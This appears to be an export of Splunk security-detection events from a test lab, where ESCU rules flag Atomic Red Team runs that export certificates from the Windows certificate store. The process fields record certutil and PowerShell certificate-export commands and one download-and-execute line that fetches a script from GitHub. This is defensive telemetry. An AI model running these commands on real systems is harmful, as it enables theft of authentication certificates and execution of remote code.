1682704581, search_name="ESCU - Windows Steal Authentication Certificates Export Certificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682704576.275251000", lastTime="2023-04-28T16:13:58", parent_process_id="0x1094", parent_process_name="powershell.exe", process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe & {$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", process_id="0x1018", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-certificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1682704581, search_name="ESCU - Windows Steal Authentication Certificates Export Certificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682704576.275251000", lastTime="2023-04-28T16:13:58", parent_process_id="0x1094", parent_process_name="powershell.exe", process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe & {$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", process_id="0x1018", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="Administrator", risk_object_type="user", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-certificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1682704581, search_name="ESCU - Windows Steal Authentication Certificates Export Certificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682704576.275251000", lastTime="2023-04-28T16:13:58", parent_process_id="4244", parent_process_name="powershell.exe", process="\"powershell.exe\" & {$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", process_id="4120", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-certificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1682704581, search_name="ESCU - Windows Steal Authentication Certificates Export Certificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682704576.275251000", lastTime="2023-04-28T16:13:58", parent_process_id="4244", parent_process_name="powershell.exe", process="\"powershell.exe\" & {$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", process_id="4120", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="Administrator", risk_object_type="user", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-certificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1682703990, search_name="ESCU - Certutil exe certificate extraction - Rule", analyticstories="Cloud Federated Credential Abuse", analyticstories="Living Off The Land", analyticstories="Windows Certificate Services", analyticstories="Windows Persistence Techniques", annotations="{\"analytic_story\": [\"Windows Persistence Techniques\", \"Cloud Federated Credential Abuse\", \"Living Off The Land\", \"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 90, \"nist\": [\"DE.CM\"]}", annotations._all="CIS 10", annotations._all="Windows Persistence Techniques", annotations._all="Living Off The Land", annotations._all="Windows Certificate Services", annotations._all="Cloud Federated Credential Abuse", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="nist", annotations.analytic_story="Windows Persistence Techniques", annotations.analytic_story="Cloud Federated Credential Abuse", annotations.analytic_story="Living Off The Land", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.nist="DE.CM", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:23", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703986.653522000", lastTime="2023-04-28T16:13:23", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0x11c0", process="\"C:\\Windows\\system32\\certutil.exe\" -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx", process_id="0x6a4", process_name="certutil.exe", risk_message="An instance of $parent_process_name$ spawning certutil.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="63.0", savedsearch_description="This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.", threat_object="certutil.exe", threat_object_type="process", user="Administrator"
1682703990, search_name="ESCU - Certutil exe certificate extraction - Rule", analyticstories="Cloud Federated Credential Abuse", analyticstories="Living Off The Land", analyticstories="Windows Certificate Services", analyticstories="Windows Persistence Techniques", annotations="{\"analytic_story\": [\"Windows Persistence Techniques\", \"Cloud Federated Credential Abuse\", \"Living Off The Land\", \"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 90, \"nist\": [\"DE.CM\"]}", annotations._all="CIS 10", annotations._all="Windows Persistence Techniques", annotations._all="Living Off The Land", annotations._all="Windows Certificate Services", annotations._all="Cloud Federated Credential Abuse", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="nist", annotations.analytic_story="Windows Persistence Techniques", annotations.analytic_story="Cloud Federated Credential Abuse", annotations.analytic_story="Living Off The Land", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.nist="DE.CM", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:23", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703986.653522000", lastTime="2023-04-28T16:13:23", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0x11c0", process="\"C:\\Windows\\system32\\certutil.exe\" -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx", process_id="0x6a4", process_name="certutil.exe", risk_message="An instance of $parent_process_name$ spawning certutil.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting export a certificate.", risk_object="Administrator", risk_object_type="user", risk_score="63.0", savedsearch_description="This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.", threat_object="certutil.exe", threat_object_type="process", user="Administrator"
1682703990, search_name="ESCU - Certutil exe certificate extraction - Rule", analyticstories="Cloud Federated Credential Abuse", analyticstories="Living Off The Land", analyticstories="Windows Certificate Services", analyticstories="Windows Persistence Techniques", annotations="{\"analytic_story\": [\"Windows Persistence Techniques\", \"Cloud Federated Credential Abuse\", \"Living Off The Land\", \"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 90, \"nist\": [\"DE.CM\"]}", annotations._all="CIS 10", annotations._all="Windows Persistence Techniques", annotations._all="Living Off The Land", annotations._all="Windows Certificate Services", annotations._all="Cloud Federated Credential Abuse", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="nist", annotations.analytic_story="Windows Persistence Techniques", annotations.analytic_story="Cloud Federated Credential Abuse", annotations.analytic_story="Living Off The Land", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.nist="DE.CM", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:23", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703986.653522000", lastTime="2023-04-28T16:13:23", parent_process="\"powershell.exe\" & {IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) certutil.exe -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx}", parent_process_id="4544", process="\"C:\\Windows\\system32\\certutil.exe\" -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx", process_id="1700", process_name="certutil.exe", risk_message="An instance of $parent_process_name$ spawning certutil.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="63.0", savedsearch_description="This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.", threat_object="certutil.exe", threat_object_type="process", user="Administrator"
1682703990, search_name="ESCU - Certutil exe certificate extraction - Rule", analyticstories="Cloud Federated Credential Abuse", analyticstories="Living Off The Land", analyticstories="Windows Certificate Services", analyticstories="Windows Persistence Techniques", annotations="{\"analytic_story\": [\"Windows Persistence Techniques\", \"Cloud Federated Credential Abuse\", \"Living Off The Land\", \"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 90, \"nist\": [\"DE.CM\"]}", annotations._all="CIS 10", annotations._all="Windows Persistence Techniques", annotations._all="Living Off The Land", annotations._all="Windows Certificate Services", annotations._all="Cloud Federated Credential Abuse", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="nist", annotations.analytic_story="Windows Persistence Techniques", annotations.analytic_story="Cloud Federated Credential Abuse", annotations.analytic_story="Living Off The Land", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.nist="DE.CM", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:23", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703986.653522000", lastTime="2023-04-28T16:13:23", parent_process="\"powershell.exe\" & {IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) certutil.exe -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx}", parent_process_id="4544", process="\"C:\\Windows\\system32\\certutil.exe\" -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx", process_id="1700", process_name="certutil.exe", risk_message="An instance of $parent_process_name$ spawning certutil.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting export a certificate.", risk_object="Administrator", risk_object_type="user", risk_score="63.0", savedsearch_description="This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.", threat_object="certutil.exe", threat_object_type="process", user="Administrator"
1682703773, search_name="ESCU - Windows Steal Authentication Certificates Export PfxCertificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="CIS 10", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703768.353640000", lastTime="2023-04-28T16:13:47", parent_process_id="0x1094", parent_process_name="powershell.exe", process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe & {$mypwd = ConvertTo-SecureString -String \\\"\"AtomicRedTeam\\\"\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", process_id="0xa0c", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-pfxcertificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1682703773, search_name="ESCU - Windows Steal Authentication Certificates Export PfxCertificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="CIS 10", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703768.353640000", lastTime="2023-04-28T16:13:47", parent_process_id="0x1094", parent_process_name="powershell.exe", process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe & {$mypwd = ConvertTo-SecureString -String \\\"\"AtomicRedTeam\\\"\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", process_id="0xa0c", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="Administrator", risk_object_type="user", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-pfxcertificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1682703773, search_name="ESCU - Windows Steal Authentication Certificates Export PfxCertificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="CIS 10", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703768.353640000", lastTime="2023-04-28T16:13:47", parent_process_id="4244", parent_process_name="powershell.exe", process="\"powershell.exe\" & {$mypwd = ConvertTo-SecureString -String \\\"\"AtomicRedTeam\\\"\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", process_id="2572", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-pfxcertificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1682703773, search_name="ESCU - Windows Steal Authentication Certificates Export PfxCertificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="CIS 10", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703768.353640000", lastTime="2023-04-28T16:13:47", parent_process_id="4244", parent_process_name="powershell.exe", process="\"powershell.exe\" & {$mypwd = ConvertTo-SecureString -String \\\"\"AtomicRedTeam\\\"\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", process_id="2572", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="Administrator", risk_object_type="user", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-pfxcertificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:14:20.321", file_name="local_machine_my_1_atomicredteam.com.pfx", file_path="C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\local_machine_my_1_atomicredteam.com.pfx", firstTime="2023-04-28T16:14:20", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:14:20", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported."
1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:14:20.296", file_name="local_machine_my_1_atomicredteam.com.der", file_path="C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\local_machine_my_1_atomicredteam.com.der", firstTime="2023-04-28T16:14:20", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:14:20", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported."
1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:14:20.296", file_name="local_machine_my_0_atomicredteam.com.pfx", file_path="C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\local_machine_my_0_atomicredteam.com.pfx", firstTime="2023-04-28T16:14:20", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:14:20", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported."
1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:14:20.273", file_name="local_machine_my_0_atomicredteam.com.der", file_path="C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\local_machine_my_0_atomicredteam.com.der", firstTime="2023-04-28T16:14:20", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:14:20", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported."
1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:13:53.770", file_name="atomicredteam.pfx", file_path="C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\atomicredteam.pfx", firstTime="2023-04-28T16:13:53", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:13:53", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported."
